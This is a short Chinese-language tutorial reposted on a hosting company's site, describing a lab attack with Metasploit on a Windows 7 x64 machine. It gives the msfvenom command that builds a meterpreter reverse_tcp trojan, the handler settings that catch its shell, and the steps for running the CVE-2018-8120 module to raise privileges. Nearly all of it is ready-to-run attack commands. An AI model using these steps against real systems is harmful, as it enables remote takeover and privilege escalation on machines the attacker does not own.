Metasploit中如何利用cve-2018-8120提升权限

发布时间:2021-12-09 18:23:07 作者:柒染
来源:亿速云 阅读:143

这篇文章将为大家详细讲解有关Metasploit中如何利用cve-2018-8120提升权限,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。

一、生成木马

目标主机:192.168.1.129(win7 x64)

攻击机:192.168.1.33 

攻击端口:12121 

生成木马:msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe

Metasploit中如何利用cve-2018-8120提升权限

二、进入监听模块          use exploit/multi/handler 

三、设置payload反弹    set windows/x64/meterpreter/reverse_tcp

Metasploit中如何利用cve-2018-8120提升权限

四、查看需要设置的参数:show options

Metasploit中如何利用cve-2018-8120提升权限

五、设置攻击机ip:set lhost 192.168.1.133

六、设置攻击端口:set lport 12121

Metasploit中如何利用cve-2018-8120提升权限

七、将生成的exe文件上传到目标主机并运行

八、run攻击

Metasploit中如何利用cve-2018-8120提升权限

九、getuid  查看权限

十、background  后台运行

Metasploit中如何利用cve-2018-8120提升权限

十一、搜索我们要利用的模块  search cve-2018-8120,并选择进入

Metasploit中如何利用cve-2018-8120提升权限

十二、run,运行,并重新查看权限

Metasploit中如何利用cve-2018-8120提升权限

关于Metasploit中如何利用cve-2018-8120提升权限就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

推荐阅读:
  1. 【API】Windows 程序提升权限函数
  2. 怎么给MySQL提升权限

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

metasploit cve-2018-8120

上一篇:Metasploit中破解各类密码的示例分析

下一篇:Metasploit中的主机探测模块是怎样进行的

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》